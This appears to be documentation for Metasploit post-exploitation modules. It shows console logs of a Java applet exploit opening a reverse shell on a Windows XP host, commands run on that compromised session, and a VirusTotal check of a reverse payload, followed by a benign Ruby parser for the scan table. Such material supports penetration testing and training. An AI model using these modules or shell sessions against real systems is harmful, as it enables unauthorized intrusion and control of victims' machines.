Multiple OS Post General Modules
execute
This module executes an arbitrary command on an open session. It works on Windows, Linux, OSX, and Unix platforms.
msf post(execute) >
[*] 10.10.0.100 java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] Sending stage (2976 bytes) to 10.10.0.100
[*] Command shell session 1 opened (10.10.0.151:4444 -> 10.10.0.100:1173) at 2012-08-31 15:06:06 -0400
msf post(execute) > show options
Module options (post/multi/general/execute):
Name     Current Setting       Required  Description
----     ---------------       --------  -----------
COMMAND  echo hell > file.txt  no        The entire command line to execute on the session
SESSION  1                     yes       The session to run this module on.
msf post(execute) > run
[*] Executing echo hell > file.txt on #<Session:shell 10.10.0.100:1173 (10.10.0.100) "Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator\Desktop>">...
[*] Response:
[*] Post module execution completed
msf post(execute) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\administrator\Desktop> dir
dir
Volume in drive C has no label.
Volume Serial Number is 2CB7-2817
Directory of C:\Documents and Settings\administrator\Desktop
08/31/2012 09:04 AM <DIR> .
08/31/2012 09:04 AM <DIR> ..
08/31/2012 09:04 AM 46 file.txt
12/29/2011 03:52 PM 70 portlist.txt
2 File(s) 1,431 bytes
2 Dir(s) 4,899,721,216 bytes free
C:\Documents and Settings\administrator\Desktop>
malware_check
This module uploads a file from the compromised host to virustotal.com and displays the scan results. It can also be run directly from within a meterpreter session. It works on Windows, Linux, OSX, and Unix platforms.
msf post(check_malware) > show options
Module options (post/multi/gather/check_malware):
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
APIKEY                       yes       VirusTotal API key
REMOTEFILE  C:\msfrev.exe    yes       A file to check from the remote machine
SESSION     1                yes       The session to run this module on.
msf post(check_malware) > run
[*] 192.168.101.129 - Checking: C:\\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\msfrev.exe (38 / 55):
=====================================================================================================================================
Antivirus Detected Version Result Update
--------- -------- ------- ------ ------
ALYac true 1.0.1.5 Gen:Variant.Zusy.Elzob.8031 20151125
AVG true 16.0.0.4460 Agent 20151125
AVware true 1.5.0.21 Trojan.Win32.Swrort.B (v) 20151124
Ad-Aware true 12.0.163.0 Gen:Variant.Zusy.Elzob.8031 20151125
AegisLab false 1.5 20151125
Agnitum true 5.5.1.3 Trojan.Rosena.Gen.1 20151124
AhnLab-V3 true 2015.11.26.00 Trojan/Win32.Shell 20151125
Alibaba false 1.0 20151125
Arcabit true 1.0.0.624 Trojan.Zusy.Elzob.D1F5F 20151125
Avast true 8.0.1489.320 Win32:SwPatch [Wrm] 20151125
Avira true 8.3.2.4 TR/Crypt.EPACK.Gen2 20151125
Baidu-International true 3.5.1.41473 Trojan.Win32.Rozena.AM 20151124
BitDefender true 7.2 Gen:Variant.Zusy.Elzob.8031 20151125
Bkav false 1.3.0.7383 20151125
ByteHero false 1.0.0.1 20151125
CAT-QuickHeal true 14.00 Trojan.Swrort.A 20151125
CMC false 1.1.0.977 20151124
ClamAV true 0.98.5.0 Win.Trojan.MSShellcode-7 20151125
Comodo true 23654 TrojWare.Win32.Rozena.A 20151125
Cyren true 5.4.16.7 W32/Swrort.A 20151125
DrWeb true 7.0.16.10090 Trojan.Swrort.1 20151125
ESET-NOD32 true 12622 a variant of Win32/Rozena.AM 20151125
Emsisoft true 3.5.0.642 Gen:Variant.Zusy.Elzob.8031 (B) 20151125
F-Prot true 4.7.1.166 W32/Swrort.A 20151125
F-Secure true 11.0.19100.45 Gen:Variant.Zusy.Elzob.8031 20151125
Fortinet true 5.1.220.0 W32/Swrort.C!tr 20151125
GData true 25 Gen:Variant.Zusy.Elzob.8031 20151125
Ikarus true T3.1.9.5.0 Trojan.Win32.Swrort 20151125
Jiangmin false 16.0.100 20151124
K7AntiVirus true 9.212.17966 Backdoor ( 04c53cce1 ) 20151125
K7GW true 9.212.17968 Backdoor ( 04c53cce1 ) 20151125
Kaspersky true 15.0.1.10 HEUR:Trojan.Win32.Generic 20151125
Malwarebytes true 2.1.1.1115 Backdoor.Bot.Gen 20151125
...snip...
[*] Post module execution completed
meterpreter > run post/multi/gather/check_malware REMOTEFILE=C:\\msfrev.exe
[*] 192.168.101.129 - Checking: C:\Users\loneferret\Downloads\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\\msfrev.exe (35 / 54):
=====================================================================================================================================
Antivirus Detected Version Result Update
--------- -------- ------- ------ ------
ALYac true 1.0.1.5 Gen:Variant.Zusy.Elzob.8031 20151125
AVG true 16.0.0.4460 Agent 20151125
AVware true 1.5.0.21 Trojan.Win32.Swrort.B (v) 20151124
Ad-Aware true 12.0.163.0 Gen:Variant.Zusy.Elzob.8031 20151125
AegisLab false 1.5 20151125
Agnitum true 5.5.1.3 Trojan.Rosena.Gen.1 20151124
..snip..
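The analysis table that check_malware prints (both runs above) is plain text, and the header ratio such as "(38 / 55)" is the number a responder usually records. The following Ruby is an added example, not code from Metasploit or the check_malware module: it parses rows of that table into records, recomputes the detection ratio, checks it against the header, and lists the engines whose signature name matches a family pattern. Rows without a Result column (engine did not detect) and results containing spaces are handled. The SAMPLE_REPORT text is constructed from a subset of the rows shown on this page; the function names are this example's own.

```ruby
# Added example (not part of Metasploit or the check_malware module):
# parse the analysis table printed by post/multi/gather/check_malware.

ScanRow = Struct.new(:engine, :detected, :version, :result, :update)

# Constructed sample: a subset of the report rows shown on this page, with a
# header ratio that matches the rows kept, an engine with no Result column,
# and results that contain spaces.
SAMPLE_REPORT = <<~REPORT
  [*] Analysis Report: C:\\msfrev.exe (6 / 8):
  Antivirus Detected Version Result Update
  --------- -------- ------- ------ ------
  ALYac true 1.0.1.5 Gen:Variant.Zusy.Elzob.8031 20151125
  AVG true 16.0.0.4460 Agent 20151125
  AVware true 1.5.0.21 Trojan.Win32.Swrort.B (v) 20151124
  AegisLab false 1.5 20151125
  ESET-NOD32 true 12622 a variant of Win32/Rozena.AM 20151125
  K7AntiVirus true 9.212.17966 Backdoor ( 04c53cce1 ) 20151125
  Bkav false 1.3.0.7383 20151125
  ClamAV true 0.98.5.0 Win.Trojan.MSShellcode-7 20151125
  ...snip...
REPORT

# Parse one table row. Returns nil for the header, the dashed separator,
# "...snip..." and anything else that is not "<engine> true|false <version> [result...] <YYYYMMDD>".
def parse_row(line)
  tokens = line.strip.split(/\s+/)
  return nil if tokens.size < 4
  return nil unless %w[true false].include?(tokens[1])
  return nil unless tokens[-1].match?(/\A\d{8}\z/)  # Update column is a date
  result = tokens[3...-1].join(' ')                  # empty when not detected
  ScanRow.new(tokens[0], tokens[1] == 'true', tokens[2],
              result.empty? ? nil : result, tokens[-1])
end

def parse_report(text)
  text.each_line.map { |l| parse_row(l) }.compact
end

# The ratio the module prints in the header, e.g. "(38 / 55)" -> [38, 55].
def header_ratio(text)
  m = text.match(/Analysis Report: .*\((\d+) \/ (\d+)\):/)
  m && [m[1].to_i, m[2].to_i]
end

# [engines that detected, engines listed]
def detection_ratio(rows)
  [rows.count(&:detected), rows.size]
end

# Engines whose signature name matches a family pattern, for pivoting in other tooling.
def engines_matching(rows, pattern)
  rows.select { |r| r.detected && r.result.to_s.match?(pattern) }.map(&:engine)
end

# False when the pasted table is truncated or was edited after the fact.
def ratio_consistent?(text)
  header_ratio(text) == detection_ratio(parse_report(text))
end

if __FILE__ == $PROGRAM_NAME
  rows = parse_report(SAMPLE_REPORT)
  det, total = detection_ratio(rows)
  puts "#{det}/#{total} engines flagged the file"
  puts "Swrort/Rozena family: #{engines_matching(rows, /Swrort|Rozena/i).join(', ')}"
  puts "Header consistent with table: #{ratio_consistent?(SAMPLE_REPORT)}"
end
```

Run against a full saved report, ratio_consistent? is the check that the pasted table is complete; on the "...snip..." output above it would return false because the header counts engines the snip removed.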